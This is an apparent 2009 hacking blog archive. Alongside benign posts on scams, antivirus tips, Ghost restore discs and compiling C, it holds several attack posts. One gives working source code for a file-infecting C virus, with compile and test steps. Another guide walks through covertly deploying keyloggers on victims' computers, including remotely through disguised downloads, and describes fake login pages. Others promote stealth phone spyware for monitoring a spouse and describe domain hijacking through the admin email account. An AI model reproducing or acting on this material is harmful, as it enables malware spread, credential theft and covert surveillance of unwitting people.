Nov 23, 2009

COMMON INTERNET SCAMS AND FRAUDS

The term Internet Scam or Internet Fraud refers to any type of fraud scheme that uses one or more online services to conduct fraudulent activities. Internet fraud can take place on computer programs such as chat rooms, e-mail, message boards, or Web sites. In this post I will discuss about some of the commonly conducted scams and frauds across the Internet.

1. Phishing Scam
This is one of the most commonly used scam to steal bank logins and other types of passwords on the Internet. Phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Phishing is typically carried out by e-mail or instant messaging.

Example:You may receive an email which claims to have come from your bank/financial institution/online service provider that asks you to click a link and update your account information. When you click such a link it will take you to a fake page which exactly resembles the original ones. Here you’ll be asked to enter your personal details such as username and password. Once you enter your personal details they will be stolen away. Such an email is more than likely the type of Internet scam known as “phishing”. Phishing is said to be highly effective and has proved to have more success rate since most of the common people fail to identify the scam.

Most legitimate companies never request any kind of personal/sensitive information via email. So it is highly recommended that you DO NOT respond to such fraudulent emails.



2. Nigerian Scams
This type of scam involves sending emails (spam) to people in bulk seeking their help to access large amount of money that is held up in a foreign bank account. This email claims that in return for the help you’ll be rewarded a percentage of the fund that involves in the transaction. Never respond to these emails since it’s none other than a scam.

In case if you respond to these emails you will be asked to deposit a small amount of money (say 1-2% of the whole fund) as an insurance or as an advance payment for the initialization of deal. However once you deposit the amount to the scammer’s account you’ll not get any further response from them and you lose your money. In fact “The large amount of money” never exists and the whole story is a trap for innocent people who are likely to become victims. The scammers use a variety of stories to explain why they need your help to access the funds. The following are some of the examples of them.

Examples:

They may claim that political climate or legal issues preclude them from accessing funds in a foreign bank account
They may claim that the person is a minor and hence needs your help to access the funds
They may claim that your last name is the same as that of the deceased person who owned the account and suggest that you act as the Next of Kin of this person in order to gain access to the funds


3. Lottery Scams
This type of scam is similar to the one discussed above. In this type you may receive an email saying that you have won a large sum of money in online lottery scheme (ex. UK Lottery) even though you have not participated in any such schemes. The message claims that your email ID was selected randomly from a lagre pool of IDs. When you respond to such emails they initially ask for your complete name and address so that they can mail the cheque accross to you. After getting those details they may also send you an image of the cheque drawn in your name and address so as to confirm the deal. But in order to mail this cheque they demand a small amount of money as insurance/shipping charge/tax in return. However if you send the amount in hope to receive the cheque all you get is nothing. You’re just trapped in a wonderful scam scheme. Thats it.


4. Other General Scams and Frauds
The following are some of the other types of scams that you should be aware of.

In general, be aware of unsolicited emails that:

Promise you money, jobs or prizes
Ask you to provide sensitive personal information
Ask you to follow a link to a website and log on to an account.
Propose lucrative business deals
However it may seem to be a difficult task for novice Internet users to identify such online scams. Here are some of the common signs of such scam emails. By knowing them it may help you to stay away.

All these scam emails never address you by your name. In turn they commonly address you something like “Dear User” or “Dear Customer” etc. This is a clear indication that the email is a fraudulent one
When you observe the email header you may notice in the “TO:” Field that, the same email is forwarded to a large group of people or the “TO:” field appears blank. So this confirms that the email was not intended particularly for you. It was forwarded for a large group of people and you are one among them

YOUR COMMENTS VALUE REALLY VERY MUCH.......

Oct 20, 2009

HIDE PARTITION IN WINDOWS

Disk partitioning is about making a physical or logical hard disk usable by the operating system. Each disk partition can be used like a hard disk by the operating system. A hard disk can be made of several partitions.
A hidden partition is such a partition which cannot b visible from my computer. Hence nobody except the one ho created the partition wont know whats inside the partition....
This is a small to create such a hidden partition and to protect your sensational datas...






  • This trick is for all those people who want to hide tons of data into their box. So here it is, if you have very important data in your hard drive placed in some partition which you do not want anybody to access then this trick is only for you!










  • Just click on start>run type gpedit.msc, now navigate through user configuration> administrative templates > windows components> windows explorer, now double click on “Hide these specified drives in My Computer” modify it accordingly then just below you will find another option “Prevent access to drives from My Computer”, double click on this option and modify it accordingly.










  • To make it visible again select "disable" by double clicking on the “Hide these specified drives in My Computer” option.                  







  • Oct 15, 2009

    windows password loop hole...




    a. ok now, what you need to do is to run compmgmt.msc

    b. and click on local users and groups.

    c. once you've gotten here you need to open up the 'users' folder.


    at this point i am walking along with you and notice that there are several
    major security holes dealing specifically with the password:
    1. double clicking on the any user name allows you a list that looks
    something like this:
    "user name"

    full name: -----------------------
    |__________________|

    description: -----------------------
    |__________________|
    --
    |_| user must change password at next logon

    --
    |_| user cannot change password

    --
    |/| password never expires

    --
    |_| account is disabled

    --
    |_| account is locked out


    "ok" "cancel" "apply"

    ok if you can get past my cheesy drawing, i must ask, did you notice that
    the "password never expires" box is checked? if you did, then you may have
    realized that this means that you can also uncheck it!

    2. if ure paying attention, you'll see that the 'user must change password
    at next logon' box is unchecked. if you put a check in this box of course,
    when you shut down the system will prompt for a new password!

    3. going back to step c.,
    right click on any account and notice the dialoge that appears:
    set password...
    all tasks
    delete
    rename
    properties
    help

    i think you can handle it from here

    ps. i wonder if you can access this data if this stuff is locked to the user
    by the admin by going in through the command prompt. i doubt it but if anyone

    found pls let me know....


    Thanks for fainted brain who gave information on this for me



    Sep 30, 2009

    DOMAIN HIJACKING


    In this post I will tell you about how the domain names are hacked and how they can be protected. The act of hacking domain names is commonly known as Domain Hijacking. For most of you, the term “domain hijacking” may seem to be like an alien. So let me first tell you what domain hijacking is all about.
    Domain hijacking is a process by which Internet Domain Names are stolen from it’s legitimate owners. Domain hijacking is also known as domain theft. Before we can proceed to know how to hijack domain names, it is necessary to understand how the domain names operate and how they get associated with a particular web server (website).
    The operation of domain name is as follows
    Any website say for example gohacking.com consists of two parts. The domain name (gohacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of domain name with the web hosting server is done as follows.
    1. After registering a new domain name, we get a control panel where in we can have a full control of the domain.
    2. From this domain control panel, we point our domain name to the web server where the website’s files are actually hosted.
    For a clear understanding let me take up a small example.
    John registers a new domain “abc.com” from an X domain registration company. He also purchases a hosting plan from Y hosting company. He uploads all of his files (.html, .php, javascripts etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “abc.com” to point to his web server (of Y). Now whenever an Internet user types “abc.com”, the domain name “abc.com” is resolved to the target web server and the web page is displayed. This is how a website actually works.
    What happens when a domain is hijacked
    Now let’s see what happens when a domain name is hijacked. To hijack a domain name you just need to get access to the domain control panel and point the domain name to some other web server other than the original one. So to hijack a domain you need not gain access to the target web server.
    For example, a hacker gets access to the domain control panel of “abc.com”. From here the hacker re-configures the domain name to point it to some other web server (Z). Now whenever an Internet user tries to access “abc.com” he is taken to the hacker’s website (Z) and not to John’s original site (Y).
    In this case the John’s domain name (abc.com) is said to be hijacked.
    How the domain names are hijacked
    To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients
    1. The domain registrar name for the target domain.
    2. The administrative email address associated with the target domain.
    These information can be obtained by accessing the WHOIS data of the target domain. To get access the WHOIS data, goto whois.domaintools.com, enter the target domain name and click on Lookup. Once the whois data is loaded, scroll down and you’ll see Whois Record. Under this you’ll get the “Administrative contact email address”.
    To get the domain registrar name, look for something like this under the Whois Record. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case if you don’t find this, then scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.
    The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it. Email hacking has been discussed in my previous post how to hack an email account.
    Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has the access to this email account he can easily reset the password of domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.
    How to protect the domain name from being hijacked
    The best way to protect the domain name is to protect the administrative email account associated with the domain. If you loose this email account, you loose your domain. So refer my previous post on how to protect your email account from being hacked. Another best way to protect your domain is to go for private domain registration. When you register a domain name using the private registration option, all your personal details such as your name, address, phone and administrative email address are hidden from the public. So when a hacker performs a WHOIS lookup for you domain name, he will not be able to find your name, phone and administrative email address. So the private registration provides an extra security and protects your privacy. Private domain registration costs a bit extra amount but is really worth for it’s advantages. Every domain registrar provides an option to go for private registration, so when you purchase a new domain make sure that you select the private registration option.

    Sep 24, 2009

    CERTAIN TIPS TO MAINTAIN A VIRUS FREE COMPUTER



    Is your computer infected with virus? Do you often get mysterious error messages? Well this is a common problem faced by almost all the computer users across the globe. There are many viruses and worms out there that could infect your computer. Some are harmless, but, they do have the capacity to do any number of nasty things, up to and including, erasing all data from your computer. However there are ways to keep viruses away from your PC. Here are the 12 tips to maintain a virus free computer.
    1. Email is one of the common ways by which your computer can catch a virus. So it is always recommended to stay away from SPAM. Open only those emails that has it’s origin from a trusted source such as those which comes from your contact list. If you are using your own private email host (other than gmail, yahoo, hotmail etc.) then it is highly recommended that you use a good anti-spam software. And finally NEVER click on any links in the emails that comes from untrusted sources.
    2. USB thumb/pen drives is another common way by which viruses spread rapidly. So it is always a good habit to perform a virus scan before copying any data onto your computer. NEVER double-click the pen drive to open it. Instead right-click on it and select the option “open”. This is a safe way to open a pen drive.
    3. Be careful about using MS Outlook. Outlook is more susceptible to worms than other e-mail programs, unless you have efficient Anti-Virus programs running. Use Pegasus or Thunderbird (by Mozilla), or a web-based program such as Hotmail or Yahoo (In Firefox).
    4. As we all know, Internet is the main source of all the malicious programs including viruses, worms, trojans etc. In fact Internet contributes to virus infection by up to 80%. So here are the tips for safe surfing habits so that you can ward off virus infection up to the maximum extent.
    • Don’t click on pop-up windows that announce a sudden disaster in your city or announce that you’ve won an hourly prize. They are the ways to mislead Internet users and you should never trust them.
    • You can also use a pop-up blocker to automatically block those pop-ups.
    5. Most of us use search engines like Google to find what we are looking for. It is quite obvious for a malicious website to get listed in the search results. So to avoid visiting those untrusted malicious websites, you can download and install the AVG LinkScanner which is a freeware. This tool can become very handy and will help you to stay away from malicious websites.
    6. Install a good antivirus software and keep it updated. Also perform full system scan periodically. It is highly recommended that you turn on the automatic update feature. This is the most essential task to protect your PC from virues. If PC security is your first option then it is recommended that you go for a shareware antivirus software over the free ones. Most of the antivirus supports the Auto-Protect feature that provides realtime security for your PC. Make sure that this feature is turned on.
    7. Install a good Antispyware program, that operates against Internet malware and spyware.
    8. Never open any email attachments that come from untrusted sources. If it is a picture, text or sound file (these attachments end in the extensions .txt, .jpeg, .gif, .bmp, .tif, .mp3, .htm, .html, and .avi), you are probably safe, but still do a scan before opening.
    9. Do not use disks that other people gave you, even from work. The disk could be infected with a virus. Of course, you can run a virus scan on it first to check it out.
    10. Set up your Windows Update to automatically download patches and upgrades. This will allow your computer to automatically download any updates to both the operating system and Internet Explorer. These updates fix security holes in both pieces of software.
    11. While you download files from untrusted websites/sources such as torrents, warez etc. make sure that you run a virus scan before executing them.
    12. And finally it is recommended not to visit the websites that feature illegal/unwanted stuffs such as cracks, serials, warez etc. since they contribute much in spreading of viruses and other malicious programs.

    Sep 7, 2009

    Create a arestore disk and partition





    Introduction
    When you buy a new computer you will usually get some sort of restore/ recovery disc. This is used to restore your operating system and software back to factory condition so your PC will run as it did when you bought it. This is usually done by saving an image of the partition where the OS & installed programs are located. The image is saved to a single file or split into a spanned set of files if it's total size exceeds FAT32's 4GB file size limitation. This guide will explain various ways to make a restore disc that you can customize and tweak to your needs. Since it uses Symantec Norton Ghost it can be used on just about any computer including those that are custom built or running Linux. The two main methods of doing this is by either storing the image on the hard disk or on a recordable disc. The advantage of storing the image to hard disk is faster speed and the flexibility of overwriting images. Very useful if you make frequent changes to your images. Ghost has the option of burning images directly to CD or DVD. The downside is that it requires the user to use the bootable floppy along with those discs. This tutorial will take it one step further and eliminate the need for a bootable floppy.


    Required tools & setup
    The screenshots from this tutorial are from a Windows XP machine. The software used is Nero 6 Ultra Edition. If you are using a different Windows operating system or burning program the instructions will differ slightly, but the process is still the same.

    1) Windows Millennium startup diskette ( http://www.bootdisk.com ) or Ghost boot disk
    2) CD or DVD burning program capable of making a bootable disc. ( http://www.nero.com, http://www.roxio.com )
    3) CD or DVD burner
    4) BIOS capable of booting up from a CD or DVD ( El Torito format specification. )

    Creating Ghost image
    This part assumes you know how to use the home or business versions of Symantec Norton Ghost. Create your partition image (partition to image). Choose the partition that the operating system & programs are installed on. Ghost does not use alphabetical DOS drive assignment. Instead it uses numeric assignment in the form of Number1:Number2. the first number is the drive. The second number is the partition within that drive. If you have no clue what this means just pay attention to the size and volume label of the partition you are selecting. Make note of what it says on the very last menu screen. What you need to know is the source & destination locations. It also says this at the very bottom of the screen. 1:2\ghost\winxp.gho usually means the image will be written to a file called winxp.gho inside a folder called ghost on drive D: So 1:1 would usually be drive C: the typical source partition where the OS & programs are install to. When restoring 1:1 will be our destination so it is reversed.






    Preparing files

    The Windows Millennium startup diskette is going to provide the files used to make our restore disc bootable. The configuration files of the boot data cannot be changed after the disc is burned. There may be a lot of trial and error so using a re-writable CD will save you from burning tons of coasters. There are hidden & system files we need to edit inside the startup disk. You need to change folder options to see them by enabling "show hidden files" and disabling "hide OS files".



    View the contents of the Windows Millennium startup diskette. We need to change only two files: autoexec.bat and config.sys. Open autoexec.bat with notepad or WordPad. We are going to tell ghost.exe where the image is stored and where to restore it to. Note if ghost.exe is in some other folder than you must specify the directory before you issue this command. After the Millennium diskette boots the computer it will start executing what we really need it to do. These are the Ghost command line switches.

    IF "%config%"=="NOCD" GOTO QUIT
    IF "%config%"=="HELP" GOTO HELP
    LH %ramd%:\MSCDEX.EXE /D:mscd001 /L:%CDROM%
    ghost.exe -clone,mode=pload,src=1:2\ghost\winxp.gho:1,dst=1:1
    ::If MSCDEX doesn't find a drive...
    IF ERRORLEVEL 1 SET CDPROB=1
    ::
    GOTO QUIT

    In this example
    src=1:2\ghost\winxp.gho:1 is the location of the image file (source) with :1designating the partition number within the image. If your image contains multiple partitions you can restore a specific partition by specifying the partition number inside the image. The comma is a separator so ,dst=1:1 (destination) means we are restoring this image to partition one on physical hard disk one (this is usually drive C:). You cannot restore an image to the same partition it is saved to. If it's a spanned image all files have to be located in the same folder. This example is for an image saved to hard disk. Using a CD or DVD burner is still very similar. You would replace the source with something like src=CDR0001\ghost\winxp.gho:1 or whichever your burner is assigned as in Ghost.

    Click here for [more Ghost command line switches]


    http://service1.symantec.com/SUPPORT/ghost.nsf/docid/1998082413392025?
    Open&src=sg&docid=1998082612540625&nsf=ghost.nsf&view=40c79ec65
    039a2b588256a0d004ca98e&dtype=&prod=&ver=&osv=&osv_lvl=


    Config.sys

    Open config.sys and edit the following to the very top of the configuration. We are reducing the DOS menu to only one choice which will execute in one second:

    Original:

    [menu]
    menuitem=HELP, Help
    menuitem=CD, Start computer with CD-ROM support.
    menuitem=NOCD, Start computer without CD-ROM support.
    menuitem=QUICK, Minimal Boot
    menudefault=HELP,30
    menucolor=7,0


    Revised:

    [menu]
    menuitem=CD, Restore Ghost Image.
    menudefault=CD,1

    menucolor=7,0

    Optional: If you want to show people what a Sci-Fi geek you are open setramd.bat and edit the echo messages like this. This step is not necessary and will be displayed while the computer is being booted up:

    @echo off
    set RAMD=
    set CDROM=

    echo.
    echo
    Retinal Scan Sequencing.....
    echo
    Optical Neural Net Database .....Searching....Verified
    echo
    Access Granted
    echo.

    --------------------------------------------------


    a:\findramd

    if "%RAMD%"=="C" goto c_drive

    goto success

    :c_drive
    echo
    Initializing Partition Load Sequence.
    echo
    System Sequence Initialized. Executing Primary Command.
    echo
    Please wait.......
    echo.
    goto success


    Another method which I haven't tried is using a Ghost boot floppy. This floppy can be made with Ghost within windows. This method would replace the Millennium disk entirely. It would also provide DOS mouse, USB2.0, firewire, and network support with Ghost. You will still have to append the command line switches to an autoexec.bat file otherwise the user will have to choose the target and source manually which makes doing all of this pointless.


    Burning Boot Disc
    Open Nero and create a Boot CD or Boot DVD compilation. Don't use the expert settings unless you have a reason to. If you are restoring the image from hard disk than a recordable CD is good enough. If you want to save the image to disc you can either span the it over multiple CD's or DVD's. If you are spanning images you must enable spanning option within ghost before creating the image. You cannot split them after the image is made. You can also choose to password protect your image. When this disc is being made it will read the Millennium diskette we just edited. Make sure you do not finalize this compilation. Don't add any extra files to it yet.


    After it is burnt put the recordable disc back in the drive and create a CD-ROM ISO continue with multisession. There is only session you can continue from so choose it. It will complain about the CD not created using the multisession option, just ignore than and accept. Here is where the files will be added. You can add whatever other files you want, but leave room for the images unless it is on hard disk. For the other spanned images just burn them to separate CD's. Ghost will prompt you to insert the next volume when it's done reading each spanned image. They must be read in consecutive order.






    When you burn the second part of the boot disc the required file you need to add to the compilation is ghost.exe. You need at least Ghost version 2003 if you are restoring an image with an operating system using an NTFS filing system.

    Notes
    You can use Ghost Explorer to add and replace files within a Ghost image if it is saved to hard disk. This saves you the hassle of creating new images if you need to make only minor changes. Gdisk can create hidden hard disk partitions. Useful if you want to save images to a hidden partition for user protection. Compaq/ HP sometimes put the images to a hidden partition because people can't screw with it unless they know the partition is there. But than again some people will still delete these partitions with a partitioning utility like FDISK not knowing what it is or what it holds. After you make a partition hidden with GDISK you can still save images to it with Ghost. GDISK is also partitioning utility like FDISK. It can also be used to perform secure disk wiping to US Department of Defense standards. This insures no data can be recovered from the hard disk.

    Here's an example from my own machine. Note the H indicating a hidden partition. It is where the Ghost image is stored

    C:\Program Files\Symantec\Norton Ghost 2003>gdisk32.exe /? GDISK32 Fixed Disk Partitioning Utility  GDISK32 [disk] [/STATUS] [/RAW|/LBA] [/SER] [/X] [/I] [/S] [/Y] [/R] GDISK32 disk /[-]ACT /P:partn-no [/X] [/I] [/S] [/Y] [/R] GDISK32 disk /[-]HIDE /P:partn-no [/X] [/I] [/S] [/Y] [/R] GDISK32 /BOOTINI {/ADD|/REMOVE|/DEFAULT} [/D:disk-no] [/P:partn-no]         [/DESC:desc] [/ENTRY:no] [/TIMEOUT:sec] [/INIFILE:filename]         [/BSECTFILE:filename] [/WINNT [/SYSFOLDER:folder]] [/R] GDISK32 [disk] /BATCH[:filename] [switch[switch...]] GDISK32 /? [/STATUS|/[-]ACT|/[-]HIDE|/BOOTINI|/BATCH]  Copyright (C) 1998-2002 Symantec Corp. All rights reserved. 2003.775.  C:\Program Files\Symantec\Norton Ghost 2003>gdisk32.exe 1 /status Disk  Partitions  Cylinders  Heads  Sectors  Mbytes  Model   1        4        14593     255      63  114473.5  WDC WD1200JB-00CRA1  Partition  Status   Type     Volume Label   Mbytes   System   Usage  C:  1        A    PRIMARY                 20481.3  NTFS/HPFS  18%      2             EXTENDED                93989.7             82%      3             LOGICAL                 81925.2  UNKNOWN    72%      4        H    LOGICAL                 12064.4  NTFS/HPFS  11%
    Usage
    Set your CD-rom as the first boot device in your motherboard's BIOS. Pressing F8 or DELETE keys at computer bootup will usually get you into the CMOS configuration setup utility.

    BIOS SETUP UTILITY
    ------BOOT-------
    1st Boot Device [ATAPI CD-ROM]
    2nd Boot Device [Floppy]
    3rd Boot Device [Hard Disk]
    Other Boot Device [Enabled]


    Put the restore disc in your CD-rom drive and restart the computer. It will boot up and at the very end Ghost will prompt a message asking "Proceed with Partition Clone YES/NO?". It typically takes five minutes to restore the operating system & software back depending on the total size of the image. If you make changes to the image on hard disk you can still use the same restore disc to initiate the process as long as the image location and destination are still the same.











    Aug 11, 2009

    HOW TO SPY ON CELL PHONES

    Are you curious to know how to spy on a cell phone? Do you want to secretly spy on SMS text messages, calls, GPS locations and other confidential info of your child’s or spouse’s cell phone? Well here is a detailed tutorial on how to spy on cell phones.
    Every day I get a lot of emails from people asking how to spy on cell phone. Before you can spy on a cell phone you need to know the following facts.
    1. To spy on a given cell phone you should make sure that the target cell phone is compatible with the cell phone spy software.
    2. Cell phone spy softwares are compatible with the following type of phones (operating systems).
    1. Symbian OS (Most Nokia Phones)
    2. Apple iphone
    3. Windows Mobile
    For a complete list of compatible cell phones visit the Mobile Spy site and click on Compatiblity link present on the left hand sidebar.
    Today most of the modern cell phones are loaded with one of the above three operating systems and hence compatibility doesn’t pose a major problem. There exists many cell phone spy softwares on the market to accomplish this job and hence people often get confused about which cell phone spy software to go for. To make this job simpler for you we personally tested some of the top cell phone spy softwares and based on the results we conclude that the following cell phone spy software to be the best one.

    Mobile Spy - The No.1 Cell Phone Spy Software

    Mobile Spy is a perfect tool for parents to monitor their childern’s activity on thier cell phone!
    Mobile Spy Features
    Mobile Spy is a hybrid spy software/service which allows you to spy on your target cell phone in real time. This unique system records the activities of anyone who uses the compatible cell phone ( iPhone, Windows Mobile or Symbian OS smartphone). For this you need to install a small application onto the cell phone. This application starts at every boot of the phone but remains stealth and does not show up in the running process list. It runs in the background and will spy on every activity that takes place on the phone.
    Logging Features
    1. Calls Log – Each incoming and outgoing number on the phone is logged along with duration and time stamp.
    2. Every text message/MMS is logged even if the phone’s logs are deleted. Includes full text.
    3. The phones’s current location is frequently logged using GPS when signal is available.
    4. Each address entered into Internet Explorer (or any browser) is logged.
    5. This cell phone spy software works in total stealth mode. The person using the phone can never come to know about the presence of this software.
    How it works
    The working of Mobile Spy is very simple and needs no extra knowledge to install and use.
    Step 1- After you purchase Mobile Spy you’ll get a link to download the software. Along with this you’ll get a username and password for you online control panel.
    Step 2- Install the downloaded cell phone spy software onto any of the compatible cell phone. After installation the software starts recording all the activities on the cell phone.
    Step 3- Login to your online control panel to see the logs containing the recorded information.
    This is just a small list of it’s features. For a list of compatible phones, step-by-step installation guide and more details visit the following link

    Mobile Spy

    Why Mobile Spy?
    Mobile Spy is one of the best and award winning cell phone spy softwares on the market with an affordable price. Mobile Spy team provides an excellent support and hence it becomes just a cakewalk to spy on your favorite cell phone! Today with an excessive usage of cell phones by many teenagers it becomes necessary for their parents to perform cell phone spying. So what are you waiting for? Go grab Mobile Spy and expose the truth.

    Aug 4, 2009

    how to compile programs in c and c++


    Many of my other posts in the blog requires to compile in c and c++ certain programs.....
    If u are completely new to C and C++, this post will help you..
    Here is a step-by-step procedure to install Borland C++ compiler 5.5 and compile C programs.

    How to install Borland C++ compiler

    1. Download Borland C++ compiler 5.5 (for Windows platform) from the following link.
    2. After you download, run freecommandlinetools.exe. The default installation path would be
    C:\Borland\BCC55
    How to configure Borland C++ compiler
    1. After you install Borland C++ compier, create two new Text Documents
    2. Open the first New Text Document.txt file and add the following two lines into it
    -I”c:\Borland\Bcc55\include”
    -L”c:\Borland\Bcc55\lib”
    Save changes and close the file. Now rename the file from New Text Document.txt tobcc32.cfg.
    3. Open the second New Text Document (2).txt file and add the following line into it
    -L”c:\Borland\Bcc55\lib”
    Save changes and close the file. Now rename the file from New Text Document (2).txtto ilink32.cfg.
    4. Now copy the two files bcc32.cfg and ilink32.cfg, navigate toC:\Borland\BCC55\Bin and paste them.

    How to compile the C source code (.C files)

    1. You need to place the .C (example.c) file to be compiled in the following location
    C:\Borland\BCC55\Bin
    2. Now goto command prompt (Start->Run->type cmd->Enter)
    3. Make the following path as the present working directory (use CD command)
    C:\Borland\BCC55\Bin
    4. To compile the file (example.c) use the following command
    bcc32 example.c
    5. Now if there exists no error in the source code you’ll get an executable file (example.exe) in the same location (C:\Borland\BCC55\Bin).
    6. Now you have successfully compiled the source code into an executable file(.exe file).
    NOTE: The above tutorial assumes that you’ve installed the compiler onto the C: drive (by default).

    Aug 3, 2009

    HOW TO HACK AN EMAIL


    The most frequent question asked by many people especially in a chat room is How to Hack an Email Account? So you as the reader are most likely reading this because you want to hack into some one’s email account. Most of the sites on the internet teach you some nonsense and outdated tricks to hack an email. But here are some of the real and working ways that can be used to hack an email account.

    THINGS YOU SHOULD KNOW BEFORE PROCEEDING
    Before you learn the real ways to hack an email, the following are the things you should be aware of.
    1. There is no ready made software that can hack emails just with a click of a button. Please don’t waste your money on such scam softwares.
    2. Never trust any hacking services that claims to hack email passwords just for $100 or $200. Often people get fooled by these services and eventually loose their money with no gain.
    3. With my experience of over 6 years in the field of Hacking and Security, I can tell you that there exists only 2 foolproof methods to hack an email. All the other methods are simply scam or don’t work. The following are the only 2 foolproof methods that work.

    1. EASIEST WAY TO HACK AN EMAIL ACCOUNT


    Today, with the advent of a program called Keylogger it’s just a cakewalk to hack an email account. It doesn’t matter whether or not you have physical access to the victim’s computer. Using a keylogger is the easiest way to hack an email account. Any one with a basic knowledge of computer can use the keylogger and within few hours you can hack any email account.
    1. What is a keylogger?
    A keylogger, sometimes called a keystroke logger, key logger, or system monitor, is a small program that monitors each keystroke a user types on a specific computer’s keyboard. Using a keylogger is the easiest way to hack an email account. A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim’s password.
    2. Where is the keylogger program available?
    A keylogger program is widely available on the internet. Some of the best ones are listed below
    3. How to install it?

    You can install these keyloggers just as any other program but these things you must keep in mind. While installing, it asks you to set a secret password and a hot key combination. This is because, after installation the keylogger program is completely hidden and the victim can no way identify it. So, you need the Hot Key combination and secret password to later unhide the keylogger.
    4. Once installed how to get password from it?

    The hacker can open the keylogger program by just pressing the hot keys (which is set during installation) and enter the password. Now it shows the logs containing every keystroke of the user,where it was pressed, at what time, including screenshots of the activities. These logs contain the password of the victim’s email account.
    5. I don’t have physical access to the victim’s target computer, what can I do?
    It doesn’t matter whether or not you have physical access to the victim’s computer. Because keyloggers like SniperSpy and Win-Spy offers Remote Installation Feature. With this feature it is possible to remotely install the keylogger on the victim’s PC.
    You can attach the keylogger with any file such as image, MS excel file or other programs and send it to the victim via email. When the victim runs the file, it will automatically get installed without his knowledge and start recording every activity on his computer. These activities are sent to you by the keylogger software via email or FTP.
    6. What is the best way to deploy the keylogger onto remote PC?
    Instead of sending the keylogger as an email attachment, it is recommended that you place the file in .ZIP/.RAR format and upload it to www.hotlinkfiles.com. After uploading, just send the direct download link to the victim via email. Once he downloads the file from this link and run it, the keylogger will get installed automatically.
    7. How can a keylogger hack the Email password?
    Hacking an email password using keylogger is as simple as this: You install the keylogger on a Remote PC (or on your local PC). The victim is unaware of the presence of the keylogger on his computer. As usual, he logs into his Email account by typing the username and password. This username and password is recorded and sent to you via Email. Now you have the password of your target email account.
    In case if you install the keylogger on your local PC, you can obtain the recorded email password just by unhiding the keylogger program (use your hot key and password to unhide).
    8. Which Keylogger is the best?
    I recommend SniperSpy as the best for the following reasons.
    1. SniperSpy is fully compatible with Windows 98/ME/2000/XP/Vista. But Winspy has known compatible issues with Vista. So if your PC or the remote PC runs Vista then Winspy is not recommended.
    2. SniperSpy is more reliable than Win-Spy since the logs sent will be received and hosted by SniperSpy servers. You need not rely on your email account to receive the logs.
    2. Unlike Winspy, Sniperspy doesn’t require anything to be installed on your computer. To monitor the remote PC all you have to do is just login to your SniperSpy account from your browser.
    3. SniperSpy is more easy to use and faster than Winspy.
    4. SniperSpy offers better support than WinSpy.


    Apart from the above mentioned reasons, both SniperSpy and WinSpy stands head-to-head. However in my opinion it’s better to go for SniperSpy since it is the best one. I have tested tons of keyloggers and the only two that stood up were SniperSpy and Winspy.
    So what are you waiting for? If you’re serious to hack an email account then go grab either of the two keyloggers now!
    For more information on these two softwares visit the following links

    2. OTHER WAYS TO HACK AN EMAIL ACCOUNT


    The other most commonly used trick to sniff password is using Fake Login Pages. Today, Fake login pages are the most widely used techniques to hack an email account. A Fake Login page is a page that appears exactly as a Login page but once we enter our password there, we end up loosing it.
    Fake login pages are created by many hackers on their sites which appear exactly as Gmail or Yahoo login pages but the entered details(username & pw) are redirected to remote server and we get redirected to some other page. Many times we ignore this but finally we loose our valuable data.
    However creating a fake login page and taking it online to successfully hack an email account is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc.
    I hope this info has helped you.
    This post is only for ducational purpose and i am not responsible for any of the harm due to it....

    Aug 1, 2009

    A VIRUS IN C


    This program is an example of how to create a virus in c.This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file.Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on.Here’s the source code of the virus program.

    FILE *virus,*host;
    int done,a=0;
    unsigned long x;
    char buff[2048];
    struct ffblk ffblk;
    clock_t st,end;
    void main()
    {
    st=clock();
    clrscr();
    done=findfirst(”*.*”,&ffblk,0);
    while(!done)
    {
    virus=fopen(_argv[0],”rb”);
    host=fopen(ffblk.ff_name,”rb+”);
    if(host==NULL)
    goto next;
    x=89088;
    printf(”Infecting %s\n”,ffblk.ff_name,a);
    while(x>2048)
    {
    fread(buff,2048,1,virus);
    fwrite(buff,2048,1,host);
    x-=2048;
    }
    fread(buff,x,1,virus);
    fwrite(buff,x,1,host);
    a++;
    next:
    {
    fcloseall();
    done=findnext(&ffblk);
    }
    }
    printf(”DONE! (Total Files Infected= %d)”,a);
    end=clock();
    printf(”TIME TAKEN=%f SEC\n”, (end-st)/CLK_TCK);
    getch();
    }
    COMPILING METHOD: BORLAND TC++ 3.0 (16-BIT): 1. Load the program in the compiler, press Alt-F9 to compile
    2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
    3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
    4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
    5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
    BORLAND C++ 5.5 (32-BIT) : 1. Compile once,note down the generated EXE file length in bytes
    2. Change the value of X in source code to this length in bytes
    3. Recompile it.The new EXE file is ready to infect
    HOW TO TEST: 1. Open new empty folder 2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
    3. Run the virus EXE file there you will see all the files in the current directory get infected.
    4.All the infected files will be ready to reinfect
    That’s it

    Jul 15, 2009

    Hacking Windows XP Passwords. for real!


    This i not actually cracking or hacking.. this is a simple method used in windows when we forget administrator password.........

    step 1:boot the computer into safe mode
